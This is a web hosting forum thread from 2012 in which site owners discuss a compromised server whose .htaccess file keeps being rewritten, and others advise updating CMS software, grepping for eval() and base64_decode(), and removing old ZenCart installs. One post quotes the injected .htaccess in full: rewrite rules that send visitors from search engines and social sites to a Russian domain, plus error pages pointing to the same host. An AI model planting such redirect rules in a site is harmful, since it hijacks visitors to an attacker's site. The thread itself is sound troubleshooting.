Current time: 04-24-2014, 01:55 AM Hello There, Guest! (LoginRegister)

Post Reply 
malicious .htaccess reappearing
02-13-2012, 06:35 PM
Post: #1
malicious .htaccess reappearing
i'll try my best to describe the problem. so my .htaccess file is somehow being overwritten with malicious code that redirects to a russian url. even if i delete the .htaccess file it reappears within 10 minutes with the same code. i deleted all my databases and removed directories that i rarely accessed. the .htaccess file has always been set to 444. i'm pulling my hair out because i don't understand how this continues to happen. just before making this thread i deleted the .htaccess file so i don't have the code to share. when it comes back i'll post the code so you'll have a better understanding.
Find all posts by this user
Quote this message in a reply
02-13-2012, 06:46 PM (This post was last modified: 02-13-2012 06:46 PM by LakeRat.)
Post: #2
RE: malicious .htaccess reappearing
It's most likely caused by not update web app software or a non-secure theme or plugin.

See this wiki page: http://wiki.dreamhost.com/Troubleshooting_Hacked_Sites

additionally this thread may be of help http://discussion.dreamhost.com/thread-132209.html
Find all posts by this user
Quote this message in a reply
02-13-2012, 07:28 PM
Post: #3
RE: malicious .htaccess reappearing
alright, it just reloaded. here's the code:

<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|ao​l|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|fac​ebook|twitter|blog|live|myspace|mail|yandex|rambler|ya|aport|linkedin|flickr|nig​ma|liveinternet|vkontakte|webalta|filesearch|yell|openstat|metabot|nol9|zoneru|k​m|gigablast|entireweb|amfibi|dmoz|yippy|search|walhello|webcrawler|jayde|findwha​t|teoma|euroseek|wisenut|about|thunderstone|ixquick|terra|lookle|metaeureka|sear​chspot|slider|topseven|allthesites|libero|clickey|galaxy|brainysearch|pocketflie​r|verygoodsearch|bellnet|freenet|fireball|flemiro|suchbot|acoon|cyber-content|devaro|fastbot|netzindex|abacho|allesklar|suchnase|schnellsuche|shareloo​k|sucharchiv|suchbiene|suchmaschine|web-archiv)\.(.*)
RewriteRule ^(.*)$ http://daliachuqimaysa.ru/gluce/index.php [R=301,L]
RewriteCond %{HTTP_REFERER} ^.*(web|websuche|witch|wolong|oekoportal|t-online|freenet|arcor|alexana|tiscali|kataweb|orange|voila|sfr|startpagina|kpnvan​daag|ilse|wanadoo|telfort|hispavista|passagen|spray|eniro|telia|bluewin|sympatic​o|nlsearch|atsearch|klammeraffe|sharelook|suchknecht|ebay|abizdirectory|alltheuk​|bhanvad|daffodil|click4choice|exalead|findelio|gasta|gimpsy|globalsearchdirecto​ry|hotfrog|jobrapido|kingdomseek|mojeek|searchers|simplyhired|splut|the-arena|thisisouryear|ukkey|uwe|friendsreunited|jaan|qp|rtl|search-belgium|apollo7|bricabrac|findloo|kobala|limier|express|bestireland|browseirelan​d|finditireland|iesearch|ireland-information|kompass|startsiden|confex|finnalle|gulesider|keyweb|finnfirma|kvasir​|savio|sol|startsiden|allpages|america|botw|chapu|claymont|clickz|clush|ehow|fin​dhow|icq|goo|westaustraliaonline)\.(.*)
RewriteRule ^(.*)$ http://daliachuqimaysa.ru/gluce/index.php [R=301,L]
</IfModule>


ErrorDocument 400 http://daliachuqimaysa.ru/gluce/index.php
ErrorDocument 401 http://daliachuqimaysa.ru/gluce/index.php
ErrorDocument 403 http://daliachuqimaysa.ru/gluce/index.php
ErrorDocument 404 http://daliachuqimaysa.ru/gluce/index.php
ErrorDocument 500 http://daliachuqimaysa.ru/gluce/index.php
Find all posts by this user
Quote this message in a reply
02-13-2012, 08:17 PM
Post: #4
RE: malicious .htaccess reappearing
Yeah mate, I had the same issue on a whole lot of my domains a while back.

I'd put in a support request and ask if they can clear out the malicious .php files that will be causing this. These files are often named things like mybest_friend.php and located in a labyrinth of sub folders.

Apparently they get in through exploits in wordpress, joomla, wiki etc. Update them all & it probably wouldn't hurt to change your ftp passwords while your at it.

Good luck.
Find all posts by this user
Quote this message in a reply
02-13-2012, 08:33 PM
Post: #5
RE: malicious .htaccess reappearing
(02-13-2012 08:17 PM)xievon Wrote:  it probably wouldn't hurt to change your ftp passwords while your at it.

You can check the logs to see if your password has been compromised. I doubt it has in this situation, so changing passwords would have absolutely no effect.

what you do want to do is grep all of your php files for something like eval() or base64_decode() etc. The source of your problem is likely found there. There are many tips on how to do it in these forums as well as the wiki. You can get an idea of how these sort of hacks work by reading this: http://markmaunder.com/2011/08/01/zero-d...ss-themes/
Find all posts by this user
Quote this message in a reply
02-13-2012, 08:33 PM
Post: #6
RE: malicious .htaccess reappearing
(02-13-2012 08:17 PM)xievon Wrote:  Yeah mate, I had the same issue on a whole lot of my domains a while back.

I'd put in a support request and ask if they can clear out the malicious .php files that will be causing this. These files are often named things like mybest_friend.php and located in a labyrinth of sub folders.

Apparently they get in through exploits in wordpress, joomla, wiki etc. Update them all & it probably wouldn't hurt to change your ftp passwords while your at it.

Good luck.

i figured that's probably what would have to happen. i went ahead and deleted even more files and sub-directories. everything that i've read online about this seems to suggest the last resort is to delete everything to be absolutely sure you've removed any exploits. just gonna start from scratch :/ at least i didn't have much worth backing up.
Find all posts by this user
Quote this message in a reply
02-13-2012, 08:38 PM
Post: #7
RE: malicious .htaccess reappearing
(02-13-2012 08:33 PM)bobocat Wrote:  You can check the logs to see if your password has been compromised. I doubt it has in this situation, so changing passwords would have absolutely no effect.

I agree - but because he didn't know where it was coming from I did say 'it couldn't hurt' Smile

Ftp exploits aren't as common, but they do still happen.

Anyway - good luck! It can be tricky.
Find all posts by this user
Quote this message in a reply
03-14-2012, 05:41 PM
Post: #8
RE: malicious .htaccess reappearing
Hello... I'm having the very same problem. I'm deleting everything I can and scanning all my sites for base64, but it's to the point of flinging myself and my computer across the room-- I've got a lot of files and several sites to babysit. Is there anything specific I should be looking for? It's rewriting my htaccess files everywhere before I even delete the old ones.
Find all posts by this user
Quote this message in a reply
03-14-2012, 05:50 PM
Post: #9
RE: malicious .htaccess reappearing
(03-14-2012 05:41 PM)mtte Wrote:  Is there anything specific I should be looking for?

Might want to jump over to the long thread on the subject... http://discussion.dreamhost.com/thread-134262.html

remote shells, timthumb and other unsecure plugin's to start.. there is much info there, but understanding is the key.

You might also try asking support for help, by opening a ticket via the panel... recent posts suggest it appears they may have developed some tools to help, but help seems to be delayed/slow due to the amount of work. the underlying fact remains you installed it and you need to understand what you installed.
Find all posts by this user
Quote this message in a reply
03-14-2012, 06:06 PM (This post was last modified: 03-14-2012 06:18 PM by mtte.)
Post: #10
RE: malicious .htaccess reappearing
(03-14-2012 05:50 PM)LakeRat Wrote:  Might want to jump over to the long thread on the subject... http://discussion.dreamhost.com/thread-134262.html

Thanks for this-- it's overwhelming, but I'll find it. I try and minimise plugins, and avoid timthumb and other known scripts. The cleaner script that someone uploaded is proving helpful. My concern is that this is the future of shared servers. I can lock down tighter than... well, than a metaphor I won't indulge. But I'm not a network admin, so I don't know if my efforts are for naught when others on the server could have backdoors with big neon signs on them.
FYI in my case, at least, it seems the culprit was to be found in an old install of ZenCart, which I'd recently dropped onto a subdomain to test some changes for a client. The version (1.38) has known security flaws, and one of my tasks was to try and upgrade the thing. I never found the malicious source file, but deleting the entire test site stopped the reappearing .htaccess problem. I think I'll upgrade it locally...

Good luck to others in the same boat-- check your ZenCart/OSCommerce files...
Find all posts by this user
Quote this message in a reply
Post Reply 


Forum Jump: